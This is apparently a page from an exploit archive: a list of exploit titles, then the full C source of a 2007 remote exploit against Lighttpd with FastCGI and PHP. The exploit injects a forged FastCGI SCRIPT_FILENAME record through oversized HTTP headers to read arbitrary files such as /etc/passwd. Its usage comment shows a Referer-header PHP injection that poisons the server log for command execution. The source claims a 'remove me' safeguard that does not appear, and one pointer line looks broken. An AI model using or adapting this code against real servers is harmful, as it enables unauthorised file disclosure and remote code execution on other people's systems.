477bcbdcc0
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
144 lines
2.5 KiB
C
Executable file
144 lines
2.5 KiB
C
Executable file
/*
|
|
* Remote Lighttpd + FastCGI + PHP example exploit
|
|
*
|
|
* Tested with Lighttpd 1.4.16 and PHP 5.2.4
|
|
*
|
|
* To avoid abuse there's a "remove me" in the code.
|
|
*
|
|
* Example:
|
|
*
|
|
* # ./exploit localhost 80 /etc/passwd
|
|
*
|
|
* or
|
|
*
|
|
* # wget --referer="<?php system('/usr/bin/id'); ?>" localhost
|
|
* # ./exploit localhost 80 /var/log/lighttpd/access.log
|
|
*
|
|
*
|
|
* Mattias Bengtsson <mattias@secweb.se>
|
|
*
|
|
* http://www.secweb.se/
|
|
*
|
|
*/
|
|
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <string.h>
|
|
#include <unistd.h>
|
|
|
|
#include <sys/types.h>
|
|
#include <sys/socket.h>
|
|
|
|
#include <netdb.h>
|
|
#include <arpa/inet.h>
|
|
#include <netinet/in.h>
|
|
|
|
int append_header(char *p, int c, int a, int b)
|
|
{
|
|
c = 0x41 + (c % 25);
|
|
|
|
memset(p, c, a + b + 4);
|
|
|
|
p[a + 0 + 0] = ':';
|
|
p[a + 0 + 1] = ' ';
|
|
p[a + b + 2] = '\r';
|
|
p[a + b + 3] = '\n';
|
|
|
|
return a + b + 4;
|
|
}
|
|
|
|
int network(const char *host, int port)
|
|
{
|
|
struct sockaddr_in addr;
|
|
struct hostent *he;
|
|
int sock;
|
|
|
|
sock = socket(AF_INET, SOCK_STREAM, 0);
|
|
|
|
addr.sin_family = AF_INET;
|
|
|
|
if((he = gethostbyname(host)) == NULL)
|
|
return 0;
|
|
|
|
memcpy(&addr.sin_addr, he->h_addr_list[0], he->h_length);
|
|
|
|
addr.sin_port = htons(port);
|
|
|
|
connect(sock, (struct sockaddr *)&addr, sizeof(addr));
|
|
|
|
return sock;
|
|
}
|
|
|
|
int main(int argc, char **argv)
|
|
{
|
|
char *b, *p;
|
|
int sock, i;
|
|
char tmp[1024];
|
|
|
|
if(argc < 4) {
|
|
fprintf(stderr, "Usage: %s <host> <port> <file>\n", argv[0]);
|
|
exit(0);
|
|
}
|
|
|
|
sock = network(argv[1], atoi(argv[2]));
|
|
|
|
if(sock <= 0) {
|
|
fprintf(stderr, "Host down?\n");
|
|
exit(0);
|
|
}
|
|
|
|
b = p = malloc(0xffff + 0xffff);
|
|
|
|
p += sprintf(p, "GET /index.php HTTP/1.1\r\n");
|
|
p += sprintf(p, "Host: %s\r\n", argv[1]);
|
|
p += sprintf(p, "A: A\r\nB: ");
|
|
|
|
*p++ = 128;
|
|
*p++ = 0x00;
|
|
*p++ = 0x54;
|
|
*p++ = 0x42;
|
|
*p++ = '\r';
|
|
*p++ = '\n';
|
|
p = 0x00;
|
|
|
|
p += append_header(p, 0, 4, 1);
|
|
p += append_header(p, 1, 200 , 25079);
|
|
|
|
p -= 3631;
|
|
|
|
*p++ = 1; // Version
|
|
*p++ = 4; // Type
|
|
*p++ = 0;
|
|
*p++ = 0;
|
|
|
|
i = sprintf(tmp, "SCRIPT_FILENAME");
|
|
sprintf(tmp + i, "%s", argv[3]);
|
|
|
|
*p++ = 0x00; // Length
|
|
*p++ = 2 + strlen(tmp); // Length
|
|
*p++ = 0x00; // Padding
|
|
*p++ = 0x10;
|
|
*p++ = i; // name_len
|
|
*p++ = strlen(tmp) - i; // var_len
|
|
|
|
memcpy(p, tmp, strlen(tmp));
|
|
|
|
p += 3631 - 8 - 2;
|
|
|
|
p += append_header(p, 2, 200, 40007);
|
|
p += sprintf(p, "\r\n\r\n");
|
|
|
|
write(sock, b, (p - b));
|
|
|
|
i = read(sock, b, 0xffff);
|
|
*(b + i) = 0;
|
|
|
|
printf("%s\n", b);
|
|
|
|
free(b);
|
|
close(sock);
|
|
|
|
return 0;
|
|
}
|
|
|
|
// milw0rm.com [2007-09-10]
|